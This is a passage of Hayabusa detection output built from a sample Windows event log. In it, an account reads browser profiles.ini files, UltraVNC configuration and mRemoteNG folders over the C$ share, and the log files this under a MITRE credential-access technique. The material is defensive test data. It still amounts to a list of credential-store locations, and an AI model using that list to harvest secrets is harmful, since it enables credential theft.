+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 